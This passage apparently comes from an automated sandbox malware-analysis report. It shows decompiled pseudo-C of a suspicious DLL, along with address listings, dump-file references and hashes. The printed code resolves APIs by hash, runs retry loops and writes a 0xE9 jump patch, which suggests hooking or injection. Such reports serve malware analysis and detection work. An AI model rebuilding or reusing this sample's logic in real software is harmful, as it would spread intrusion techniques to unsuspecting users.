					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v592 = _v592 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v588 + 0x88)) = 0x73f8f999;
					asm("movq [eax+0x8], xmm0");
					E6E88F8C4( &_v588, E6E88F568( &_v588) + 0x10);
					E6E88F558( &_v592, E6E88F568( &_v592) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v600 = _v600 + 1;
					_t762 =  &_v596;
					asm("pxor xmm0, xmm0");
					_t160 = _t762 + 0x88; // 0xa8
					 *_t160 = 0x4145240a;
					asm("movq [eax+0x8], xmm0");
					E6E88F8C4( &_v596, E6E88F568( &_v596) + 0x10);
					E6E88F558( &_v600, E6E88F568( &_v600) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v608 = _v608 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v604 + 0x88)) = 0xf06b4c6b;
					asm("movq [eax+0x8], xmm0");
					E6E88F8C4( &_v604, E6E88F568( &_v604) + 0x10);
					E6E88F558( &_v608, E6E88F568( &_v608) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v616 = _v616 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v612 + 0x88)) = 0x7d07f92f;
					asm("movq [eax+0x8], xmm0");
					E6E88F8C4( &_v612, E6E88F568( &_v612) + 0x10);
					E6E88F558( &_v616, E6E88F568( &_v616) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v624 = _v624 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v620 + 0x88)) = 0x2c2324e8;
					asm("movq [eax+0x8], xmm0");
					E6E88F8C4( &_v620, E6E88F568( &_v620) + 0x10);
					E6E88F558( &_v624, E6E88F568( &_v624) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t857 = _t955;
					 *_t857 =  *_t857 + 1;
					E6E89413C(0xa5eabdf8, _t857);
					E6E88F558( &_v628, 0);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0xf4], xmm0");
					E6E88F558( &_v632, 0x10);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0xfc], xmm0");
					E6E88F558( &_v636, 0x20);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x104], xmm0");
					E6E88F558( &_v640, 0x30);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x10c], xmm0");
					E6E88F558( &_v644, 0x40);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x114], xmm0");
					E6E88F558( &_v648, 0x50);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x11c], xmm0");
					E6E88F558( &_v652, 0x60);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x124], xmm0");
					E6E88F558( &_v656, 0x70);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [ecx+0x118], xmm0");
					_t534 = E6E88A5A4( &_v644, __eflags);
					_v524 = _t857;
					_t950 = _t534;
					__eflags = _t950 - 0xffffffffffffffff | _t857 - 0xffffffffffffffff;
					if((_t950 - 0xffffffffffffffff | _t857 - 0xffffffffffffffff) == 0) {
						L50:
						E6E88B608(_t955 + 0xbc);
						E6E88CDE0( &_v320, __eflags);
						goto L51;
					}
					_t858 =  &_v128;
					__eflags =  *_t858 | _t858[1];
					if(( *_t858 | _t858[1]) != 0) {
						L18:
						_v396 = 0;
						while(1) {
							__eflags = E6E88AD68(0x80, _t950, _v400, _v112, _v132);
							if(__eflags != 0) {
								break;
							}
							_t605 = E6E88A5A4( &_v520, __eflags);
							_v400 = 0x80;
							_t950 = _t605;
							__eflags = _t950 - 0xffffffffffffffff | 0x81;
							if((_t950 - 0xffffffffffffffff | 0x81) == 0) {
								goto L50;
							}
							_t878 =  &_v396;
							_t609 =  *_t878 + 1;
							 *_t878 = _t609;
							__eflags = _t609 - 0xa;
							if(_t609 != 0xa) {
								continue;
							}
							goto L50;
						}
						_v396 = 0;
						while(1) {
							_push(0x80);
							_push(_v132);
							_push(_v112);
							_push(_v400);
							_push(_t950);
							_t860 =  &(( &_v520)[0x38]);
							__eflags = E6E88A298( &_v520, _t860);
							if(__eflags != 0) {
								break;
							}
							_t600 = E6E88A5A4( &_v540, __eflags);
							_v420 = _t860;
							_t950 = _t600;
							__eflags = _t950 - 0xffffffffffffffff | _t860 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t860 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t877 =  &_v416;
							_t604 =  *_t877 + 1;
							 *_t877 = _t604;
							__eflags = _t604 - 0xa;
							if(_t604 != 0xa) {
								continue;
							}
							goto L50;
						}
						asm("cdq");
						asm("movd xmm1, eax");
						_v416 =  *((intOrPtr*)(_t955 + 0x1a4));
						_t647 =  &_v408;
						asm("movd xmm0, edx");
						asm("punpckldq xmm1, xmm0");
						 *_t647 = 0;
						 *((intOrPtr*)(_t647 - 4)) = _v188;
						asm("movq [edx], xmm1");
						_t544 = E6E893BA0(_t951, _t647 - 8, __eflags,  &(_t647[0x48]), 0x40, _t647);
						__eflags = _t544;
						if(_t544 != 0) {
							goto L50;
						}
						_v180 = 0;
						while(1) {
							_t863 = _v184;
							__eflags = E6E88AD68(_t863, _t950, _v420,  *((intOrPtr*)(_t955 + 0x1a8)), _v188);
							if(__eflags != 0) {
								break;
							}
							_t595 = E6E88A5A4( &_v540, __eflags);
							_v420 = _t863;
							_t950 = _t595;
							__eflags = _t950 - 0xffffffffffffffff | _t863 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t863 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t876 =  &_v180;
							_t599 =  *_t876 + 1;
							 *_t876 = _t599;
							__eflags = _t599 - 0xa;
							if(_t599 != 0xa) {
								continue;
							}
							goto L50;
						}
						_v184 = 0;
						while(1) {
							_t546 = E6E88F558( &_v404, 0);
							_push(E6E88F568( &_v408));
							_push(_v192);
							_push(_v144);
							_push(_v424);
							_push(_t950);
							_t864 = _t546;
							__eflags = E6E88A298( &_v544, _t864);
							if(__eflags != 0) {
								break;
							}
							_t590 = E6E88A5A4( &_v560, __eflags);
							_v440 = _t864;
							_t950 = _t590;
							__eflags = _t950 - 0xffffffffffffffff | _t864 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t864 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t875 =  &_v204;
							_t594 =  *_t875 + 1;
							 *_t875 = _t594;
							__eflags = _t594 - 0xa;
							if(_t594 != 0xa) {
								continue;
							}
							goto L50;
						}
						_t550 = E6E893BA0(_t951,  &_v428 - 8, __eflags,  &_v428 + 0x120, _v428,  &_v428);
						__eflags = _t550;
						if(_t550 != 0) {
							goto L50;
						}
						E6E88F620( &_v208, 0);
						_v100 = 0xe9;
						E6E88F578( &_v100 - 0x70, __eflags,  &_v100, 1);
						_t650 =  &_v104;
						_t556 = _v172 -  *((intOrPtr*)(_t650 - 0x54)) + 0xfffffffb;
						__eflags = _t556;
						 *_t650 = _t556;
						E6E88F578(_t650 - 0x74, __eflags, _t650, 4);
						_t907 =  &_v448;
						asm("movq xmm0, [0x6e89b798]");
						 *((intOrPtr*)(_t907 - 8)) = _v196;
						 *((intOrPtr*)(_t907 - 4)) =  *((intOrPtr*)(_t907 + 0x110));
						asm("movq [ebx], xmm0");
						E6E893BA0(_t951, _t907 + 0x120 - 0x128, __eflags, _t907 + 0x120, 0x40, _t907);
						_v192 = 0;
						while(1) {
							_t561 = E6E88F558( &_v208, 0);
							_push(E6E88F568( &_v212));
							_push(_v160);
							_push(_v180);
							_push(_v444);
							_push(_t950);
							_t867 = _t561;
							__eflags = E6E88A298( &_v564, _t867);
							if(__eflags != 0) {
								break;
							}
							_t585 = E6E88A5A4( &_v580, __eflags);
							_v460 = _t867;
							_t950 = _t585;
							__eflags = _t950 - 0xffffffffffffffff | _t867 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t867 - 0xffffffffffffffff) == 0) {
								L49:
								E6E88F6F0(_t955 + 0x174);
								goto L50;
							}
							_t874 =  &_v180;
							_t589 =  *_t874 + 1;
							 *_t874 = _t589;
							__eflags = _t589 - 0xa;
							if(_t589 != 0xa) {
								continue;
							}
							goto L49;
						}
						_v180 = 0;
						while(1) {
							_t955 = _t955 + 0xffffffd8;
							asm("pxor xmm0, xmm0");
							_v640 = _t950;
							_v636 = _v460;
							_t868 = _v196;
							_v632 = _t868;
							_v628 = _v176;
							_t806 =  &_v580;
							_v624 =  *((intOrPtr*)(_t806 + 0x198));
							_v620 =  *((intOrPtr*)(_t806 + 0x184));
							asm("movq [esp+0x18], xmm0");
							asm("movq [esp+0x20], xmm0");
							__eflags = E6E88AD04(__eflags);
							if(__eflags != 0) {
								break;
							}
							_t579 = E6E88A5A4( &_v616, __eflags);
							_v496 = _t868;
							_t950 = _t579;
							__eflags = _t950 - 0xffffffffffffffff | _t868 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t868 - 0xffffffffffffffff) == 0) {
								goto L49;
							}
							_t872 =  &_v216;
							_t584 =  *_t872 + 1;
							 *_t872 = _t584;
							__eflags = _t584 - 0xa;
							if(__eflags != 0) {
								continue;
							}
							goto L49;
						}
						_push(0);
						_t869 = _v164;
						__eflags = _t869;
						_t870 =  !=  ? _t869 + 0xc : _t869;
						_push( !=  ? _t869 + 0xc : _t869);
						_t567 = E6E88C3A8(_t869,  &_v416, 0x2710);
						E6E88F6F0(_t955 + 0x184);
						E6E88B608( &_v448);
						E6E88CDE0( &_v416, __eflags);
						E6E88F6F0( &_v480);
						E6E88F6F0( &_v464);
						E6E88F6F0( &_v432);
						E6E88F6F0( &_v632);
						E6E88B680( &_v592);
						E6E88F6F0( &_v608);
						__eflags = _t567;
						return 0 | _t567 == 0x00000000;
					}
					_v388 = 0;
					do {
						E6E88F620(_t955 + 0x188, 0);
						_push(0x23627913);
						_push(_t955 + 0x1cc);
						E6E891D00();
						E6E88DD7C(_t955 + 0x1d0 - 8, _t955 + 0x1d0);
						_t879 = 0x7fffffff;
						E6E88F578( &_v168, __eflags, _v92, E6E88E94C(_v92, 0x7fffffff));
						E6E88E054( &_v100);
						E6E88D098( &_v108);
						_t836 =  &_v176;
						_t665 =  *((intOrPtr*)(_t836 + 0x28));
						 *((intOrPtr*)(_t836 - 0xf0)) = _v156;
						__eflags = E6E88F568(_t836);
						if(__eflags <= 0) {
							L12:
							_t955 = _t955 + 0xffffffd8;
							asm("movq xmm0, [esp+0xac]");
							asm("pxor xmm1, xmm1");
							_t837 =  &_v528;
							_v588 = _t950;
							_v584 =  *((intOrPtr*)(_t837 + 0x78));
							asm("movq [esp+0x8], xmm0");
							_v572 =  *((intOrPtr*)(_t837 + 0x198));
							_v568 =  *((intOrPtr*)(_t837 + 0x184));
							asm("movq [esp+0x18], xmm1");
							asm("movq [esp+0x20], xmm1");
							_t622 = E6E88AD04(__eflags);
							__eflags = _t622;
							if(_t622 != 0) {
								E6E89218C(0x3e8, _t879, _t950);
								E6E88F6F0( &_v196);
								E6E88ADB8( &_v564,  &(( &_v172)[5]), __eflags,  &_v172);
								_t881 =  &_v176;
								__eflags =  *_t881 | _t881[1];
								if(__eflags != 0) {
									goto L18;
								}
								_t629 = E6E88A5A4( &_v564, __eflags);
								_v444 = _t881;
								_t950 = _t629;
								__eflags = _t950 - 0xffffffffffffffff | _t881 - 0xffffffffffffffff;
								if((_t950 - 0xffffffffffffffff | _t881 - 0xffffffffffffffff) == 0) {
									goto L50;
								}
								goto L16;
							}
							L13:
							E6E88F6F0( &_v196);
							goto L50;
						}
						_v404 = 0;
						while(1) {
							_t635 = E6E88F558( &_v160, _v404);
							_t879 = _t635;
							_t955 = _t955 + 0xffffffd8;
							asm("movq xmm0, [esp+0x94]");
							_t844 =  &_v532;
							asm("movq xmm1, [0x6e89b790]");
							_v592 = _t950;
							_v588 =  *((intOrPtr*)(_t844 + 0x78));
							asm("movq [esp+0x8], xmm0");
							_v576 = _t665;
							_v572 =  *((intOrPtr*)(_t844 + 0x80));
							_v568 =  *_t635 & 0x000000ff;
							_v564 = 0;
							asm("movq [esp+0x20], xmm1");
							_t638 = E6E88AD04(__eflags);
							__eflags = _t638;
							if(_t638 == 0) {
								goto L13;
							}
							_t845 = 0x64;
							E6E89218C(_t845, _t879, _t950);
							_t665 = _t665 + 1;
							asm("adc dword [ecx-0xf0], 0x0");
							 *((intOrPtr*)( &_v196 - 0xf4)) =  *((intOrPtr*)( &_v196 - 0xf4)) + 1;
							__eflags = E6E88F568( &_v196) - _v440;
							if(__eflags > 0) {
								continue;
							}
							goto L12;
						}
						goto L13;
						L16:
						_t882 =  &_v432;
						_t633 =  *_t882 + 1;
						 *_t882 = _t633;
						__eflags = _t633 - 0xa;
					} while (_t633 != 0xa);
					goto L50;
				}
				L1:
				E6E88F6F0( &_v532);
				E6E88B680( &_v492);
				E6E88F6F0( &_v508);
				return 0;
			}

0x6e889144
0x6e889148
0x6e88914e
0x6e889150
0x6e889161
0x6e889164
0x6e88916b
0x6e889174
0x6e88917b
0x6e88917f
0x6e889188
0x6e88918f
0x6e889197
0x6e88919c
0x6e8891ab
0x6e8891af
0x6e8891c4
0x6e8891da
0x6e8891e8
0x6e8891e9
0x6e8891ea
0x6e8891eb
0x6e8891ec
0x6e8891f3
0x6e8891f7
0x6e889201
0x6e889216
0x6e88922c
0x6e88923a
0x6e88923b
0x6e88923c
0x6e88923d
0x6e88923e
0x6e889245
0x6e889249
0x6e889253
0x6e889268
0x6e88927e
0x6e88928c
0x6e88928d
0x6e88928e
0x6e88928f
0x6e889290
0x6e889297
0x6e88929b
0x6e8892a5
0x6e8892ba
0x6e8892d0
0x6e8892de
0x6e8892df
0x6e8892e0
0x6e8892e1
0x6e8892e2
0x6e8892e9
0x6e8892ed
0x6e8892f7
0x6e88930c
0x6e889322
0x6e889330
0x6e889331
0x6e889332
0x6e889333
0x6e889334
0x6e88933b
0x6e88933f
0x6e889349
0x6e88935e
0x6e889374
0x6e889382
0x6e889383
0x6e889384
0x6e889385
0x6e88938e
0x6e889390
0x6e88939b
0x6e8893a0
0x6e8893a5
0x6e8893b1
0x6e8893b6
0x6e8893bb
0x6e8893c7
0x6e8893cc
0x6e8893d1
0x6e8893dd
0x6e8893e2
0x6e8893e7
0x6e8893f3
0x6e8893f8
0x6e8893fd
0x6e889409
0x6e88940e
0x6e88941a
0x6e889420
0x6e889430
0x6e889435
0x6e88943e
0x6e889447
0x6e88947e
0x6e889487
0x6e88948c
0x6e889497
0x6e8894a1
0x6e8894a7
0x6e8894b9
0x6e8894cf
0x6e8894dd
0x6e8894de
0x6e8894df
0x6e8894e0
0x6e8894e1
0x6e8894e8
0x6e8894f2
0x6e8894f8
0x6e88950a
0x6e889520
0x6e88952e
0x6e88952f
0x6e889530
0x6e889531
0x6e889532
0x6e889539
0x6e889543
0x6e889549
0x6e88955b
0x6e889571
0x6e88957f
0x6e889580
0x6e889581
0x6e889582
0x6e889583
0x6e889586
0x6e889589
0x6e88959f
0x6e8895a4
0x6e8895a8
0x6e8895b3
0x6e8895b8
0x6e8895bd
0x6e8895c9
0x6e8895ce
0x6e8895d3
0x6e8895e7
0x6e8895ef
0x6e8895f6
0x6e889606
0x6e889614
0x6e889620
0x6e889622
0x6e889629
0x6e88963c
0x6e889643
0x6e88965c
0x6e88966a
0x6e889681
0x6e88968f
0x6e889694
0x6e8896a0
0x6e8896ad
0x6e8896b4
0x6e8896c9
0x6e8896ce
0x6e8896d5
0x6e8896dc
0x6e8896e3
0x6e88a1d7
0x6e88a1de
0x6e88a1ea
0x6e88a1f6
0x00000000
0x6e88a1f6
0x6e8896f0
0x6e8896f7
0x00000000
0x00000000
0x6e88970c
0x6e889711
0x6e889722
0x6e889727
0x6e889733
0x6e88973a
0x6e889740
0x6e889745
0x6e889748
0x6e88974e
0x6e88975c
0x6e88975d
0x6e889761
0x6e889765
0x6e889769
0x6e88977e
0x6e889789
0x6e88978a
0x6e88978e
0x6e889792
0x6e889796
0x6e8897a0
0x6e8897b6
0x6e8897b7
0x6e8897bb
0x6e8897bf
0x6e8897c3
0x6e8897df
0x6e8897f5
0x6e8897f5
0x6e8897fb
0x6e8897fd
0x6e889800
0x6e889805
0x6e88980c
0x6e889810
0x6e889814
0x6e88981a
0x6e889820
0x6e889832
0x6e889848
0x6e889856
0x6e889857
0x6e889858
0x6e889859
0x6e88985a
0x6e889861
0x6e88986b
0x6e889871
0x6e889883
0x6e889899
0x6e8898a7
0x6e8898a8
0x6e8898a9
0x6e8898aa
0x6e8898ab
0x6e8898b2
0x6e8898bc
0x6e8898c2
0x6e8898d4
0x6e8898ea
0x6e8898f8
0x6e8898f9
0x6e8898fa
0x6e8898fb
0x6e8898fc
0x6e889903
0x6e88990d
0x6e889913
0x6e889925
0x6e88993b
0x6e889949
0x6e88994a
0x6e88994b
0x6e88994c
0x6e88994d
0x6e889950
0x6e889954
0x6e889958
0x6e88995e
0x6e889964
0x6e889976
0x6e88998c
0x6e88999a
0x6e88999b
0x6e88999c
0x6e88999d
0x6e88999e
0x6e8899a5
0x6e8899af
0x6e8899b5
0x6e8899c7
0x6e8899dd
0x6e8899eb
0x6e8899ec
0x6e8899ed
0x6e8899ee
0x6e8899ef
0x6e8899f6
0x6e889a00
0x6e889a06
0x6e889a18
0x6e889a2e
0x6e889a3c
0x6e889a3d
0x6e889a3e
0x6e889a3f
0x6e889a40
0x6e889a47
0x6e889a51
0x6e889a57
0x6e889a69
0x6e889a7f
0x6e889a8d
0x6e889a8e
0x6e889a8f
0x6e889a90
0x6e889a96
0x6e889a99
0x6e889a9b
0x6e889aa6
0x6e889aab
0x6e889ab0
0x6e889abf
0x6e889ac4
0x6e889ac9
0x6e889ad8
0x6e889add
0x6e889ae2
0x6e889af1
0x6e889af6
0x6e889afb
0x6e889b0a
0x6e889b0f
0x6e889b14
0x6e889b23
0x6e889b28
0x6e889b2d
0x6e889b3c
0x6e889b41
0x6e889b46
0x6e889b55
0x6e889b5a
0x6e889b63
0x6e889b6b
0x6e889b70
0x6e889b77
0x6e889b84
0x6e889b86
0x6e88a1bf
0x6e88a1c6
0x6e88a1d2
0x00000000
0x6e88a1d2
0x6e889b8c
0x6e889b95
0x6e889b98
0x6e889db0
0x6e889db0
0x6e889dbb
0x6e889ddf
0x6e889de1
0x00000000
0x00000000
0x6e889de7
0x6e889dec
0x6e889df3
0x6e889e00
0x6e889e02
0x00000000
0x00000000
0x6e889e08
0x6e889e11
0x6e889e12
0x6e889e14
0x6e889e17
0x00000000
0x00000000
0x00000000
0x6e889e19
0x6e889e1e
0x6e889e29
0x6e889e29
0x6e889e2e
0x6e889e35
0x6e889e3c
0x6e889e43
0x6e889e48
0x6e889e53
0x6e889e55
0x00000000
0x00000000
0x6e889e5b
0x6e889e60
0x6e889e67
0x6e889e74
0x6e889e76
0x00000000
0x00000000
0x6e889e7c
0x6e889e85
0x6e889e86
0x6e889e88
0x6e889e8b
0x00000000
0x00000000
0x00000000
0x6e889e8d
0x6e889e9b
0x6e889ea3
0x6e889eae
0x6e889eb5
0x6e889ebc
0x6e889ec0
0x6e889ec4
0x6e889eca
0x6e889ed5
0x6e889ee0
0x6e889ee5
0x6e889ee7
0x00000000
0x00000000
0x6e889eed
0x6e889ef8
0x6e889f0e
0x6e889f1e
0x6e889f20
0x00000000
0x00000000
0x6e889f26
0x6e889f2b
0x6e889f32
0x6e889f3f
0x6e889f41
0x00000000
0x00000000
0x6e889f47
0x6e889f50
0x6e889f51
0x6e889f53
0x6e889f56
0x00000000
0x00000000
0x00000000
0x6e889f58
0x6e889f5d
0x6e889f68
0x6e889f71
0x6e889f84
0x6e889f85
0x6e889f8c
0x6e889f93
0x6e889f9a
0x6e889f9b
0x6e889fa6
0x6e889fa8
0x00000000
0x00000000
0x6e889fae
0x6e889fb3
0x6e889fba
0x6e889fc7
0x6e889fc9
0x00000000
0x00000000
0x6e889fcf
0x6e889fd8
0x6e889fd9
0x6e889fdb
0x6e889fde
0x00000000
0x00000000
0x00000000
0x6e889fe0
0x6e88a000
0x6e88a005
0x6e88a007
0x00000000
0x00000000
0x6e88a016
0x6e88a022
0x6e88a02d
0x6e88a039
0x6e88a043
0x6e88a043
0x6e88a046
0x6e88a04e
0x6e88a05a
0x6e88a069
0x6e88a071
0x6e88a074
0x6e88a07d
0x6e88a08d
0x6e88a092
0x6e88a09d
0x6e88a0a6
0x6e88a0b9
0x6e88a0ba
0x6e88a0c1
0x6e88a0c8
0x6e88a0cf
0x6e88a0d0
0x6e88a0db
0x6e88a0dd
0x00000000
0x00000000
0x6e88a0e3
0x6e88a0e8
0x6e88a0ef
0x6e88a0fa
0x6e88a0fc
0x6e88a1b3
0x6e88a1ba
0x00000000
0x6e88a1ba
0x6e88a102
0x6e88a10b
0x6e88a10c
0x6e88a10e
0x6e88a111
0x00000000
0x00000000
0x00000000
0x6e88a113
0x6e88a118
0x6e88a123
0x6e88a123
0x6e88a126
0x6e88a12a
0x6e88a134
0x6e88a138
0x6e88a13f
0x6e88a14a
0x6e88a14e
0x6e88a158
0x6e88a162
0x6e88a166
0x6e88a16c
0x6e88a177
0x6e88a179
0x00000000
0x00000000
0x6e88a183
0x6e88a188
0x6e88a18f
0x6e88a19a
0x6e88a19c
0x00000000
0x00000000
0x6e88a19e
0x6e88a1a7
0x6e88a1a8
0x6e88a1aa
0x6e88a1ad
0x00000000
0x00000000
0x00000000
0x6e88a1ad
0x6e88a200
0x6e88a202
0x6e88a209
0x6e88a20e
0x6e88a211
0x6e88a21f
0x6e88a230
0x6e88a23c
0x6e88a248
0x6e88a254
0x6e88a260
0x6e88a26c
0x6e88a275
0x6e88a27e
0x6e88a287
0x6e88a28e
0x00000000
0x6e88a290
0x6e889b9e
0x6e889ba9
0x6e889bb2
0x6e889bb7
0x6e889bc3
0x6e889bc4
0x6e889bd4
0x6e889be2
0x6e889bf5
0x6e889c01
0x6e889c0d
0x6e889c19
0x6e889c20
0x6e889c23
0x6e889c2e
0x6e889c30
0x6e889cdb
0x6e889cdb
0x6e889cde
0x6e889ce7
0x6e889ceb
0x6e889cef
0x6e889cf5
0x6e889cf9
0x6e889d05
0x6e889d0f
0x6e889d13
0x6e889d19
0x6e889d1f
0x6e889d24
0x6e889d26
0x6e889d3e
0x6e889d4a
0x6e889d5e
0x6e889d63
0x6e889d6c
0x6e889d6f
0x00000000
0x00000000
0x6e889d75
0x6e889d7a
0x6e889d81
0x6e889d8e
0x6e889d90
0x00000000
0x00000000
0x00000000
0x6e889d90
0x6e889d28
0x6e889d2f
0x00000000
0x6e889d2f
0x6e889c36
0x6e889c41
0x6e889c4f
0x6e889c54
0x6e889c56
0x6e889c59
0x6e889c62
0x6e889c66
0x6e889c6e
0x6e889c74
0x6e889c78
0x6e889c7e
0x6e889c8b
0x6e889c8f
0x6e889c93
0x6e889c9b
0x6e889ca1
0x6e889ca6
0x6e889ca8
0x00000000
0x00000000
0x6e889cac
0x6e889cad
0x6e889cb2
0x6e889cbc
0x6e889cc3
0x6e889cce
0x6e889cd5
0x00000000
0x00000000
0x00000000
0x6e889cd5
0x00000000
0x6e889d96
0x6e889d96
0x6e889d9f
0x6e889da0
0x6e889da2
0x6e889da2
0x00000000
0x6e889dab
0x6e889449
0x6e88944d
0x6e889456
0x6e88945f
0x00000000

Strings

$EA, xrefs: 6E8891E1

Memory Dump Source

Source File: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, Offset: 6E880000, based on PE: true

Associated: 00000002.00000002.494843808.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494920728.000000006E89A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494930657.000000006E89D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.494950242.000000006E89F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $EA
API String ID: 0-4251458306
Opcode ID: 5c909d3b2ebd28faed3c52f6b1285e993d2cf318238575db420f588a76829a86
Instruction ID: e403bc98c16829e6c4f3d993d9be02cd902ce0b4d7ba379754f3b9dd3615c96b
Opcode Fuzzy Hash: 5c909d3b2ebd28faed3c52f6b1285e993d2cf318238575db420f588a76829a86
Instruction Fuzzy Hash: 45A260714147459BC721DFA8C840BDFB7F8BFA5304F108E2EA8999B1A1EF30A945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E88A5A4, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E6E88A5A4(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E6E88B714(_t439 + 0x24, _t392, 0x7fffffff);
					if(E6E88F56C(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E6E88F6F0(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E6E89218C(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E6E88F6F0(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E6E88F620(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E6E88F620(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x6e89b7a8]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E6E892F8C(0xa5eabdf8, 0xd1a06a90);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E6E88F558( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E6E88F558( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E6E88B680(_t439 + 0x34);
											E6E88B680(_t439 + 8);
											goto L65;
										}
										L62:
										E6E88B680(_t439 + 0x34);
										E6E88B680(_t439 + 8);
										goto L63;
									}
									_t392 = E6E88F558(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E6E88CB48(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E6E88C33C(_t324);
									if(__eflags != 0) {
										break;
									}
									E6E88F8C4(_t439 + 0x14, E6E88F568(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E6E88F558(_t439 + 0x14, E6E88F568(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E6E892F8C(0xa5eabdf8, 0xf3119fba);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E6E88F8C4(_t439 + 0x40, E6E88F568(_t439 + 0x3c) + 4);
											 *(E6E88F558(_t439 + 0x40, E6E88F568(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
